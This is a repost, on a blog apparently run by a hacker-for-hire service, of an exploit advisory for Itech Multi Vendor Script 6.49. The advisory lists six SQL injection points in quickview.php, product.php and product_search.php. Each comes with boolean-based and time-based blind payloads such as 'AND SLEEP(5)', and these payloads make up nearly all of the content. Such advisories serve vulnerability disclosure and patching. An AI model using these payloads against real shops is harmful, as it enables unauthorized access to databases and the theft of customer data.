Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863100620

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title :  Itech Multi Vendor Script - Multiple SQL Injections
# Author 		:  Yunus YILDIRIM (Th3GundY)
# Team 			:  CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website 		:  http://www.yunus.ninja
# Contact 		:  yunusyildirim@protonmail.com

# Vendor Homepage : http://itechscripts.com/
# Software Link   : http://itechscripts.com/multi-vendor-shopping-script/
# Vuln. Version	  : 6.49
# Demo			  : http://multi-vendor.itechscripts.com


# # # #  DETAILS  # # # # 

SQL Injections :

# 1
http://localhost/quickview.php?id=10
	Parameter: id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: id=10 AND 9776=9776

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: id=10 AND SLEEP(5)

# 2
http://localhost/product.php?id=9
	Parameter: id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: id=9 AND 9693=9693

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: id=9 AND SLEEP(5)

# 3
http://localhost/product_search.php?search=Adidas
	Parameter: search (GET)
	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: search=Adidas%' AND SLEEP(5) AND '%'='

# 4
http://localhost/product_search.php?category_id=1
	Parameter: category_id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: category_id=1 AND 8225=8225

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: category_id=1 AND SLEEP(5)

# 5
http://localhost/product_search.php?category_id=1&sub_category_id=1&sub_sub_category_id=1
	Parameter: sub_sub_category_id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND 7485=7485

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND SLEEP(5)

# 6
http://localhost/product_search.php?category_id=1&sub_category_id=1
	Parameter: sub_category_id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: category_id=1&sub_category_id=1 AND 5242=5242

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: category_id=1&sub_category_id=1 AND SLEEP(5)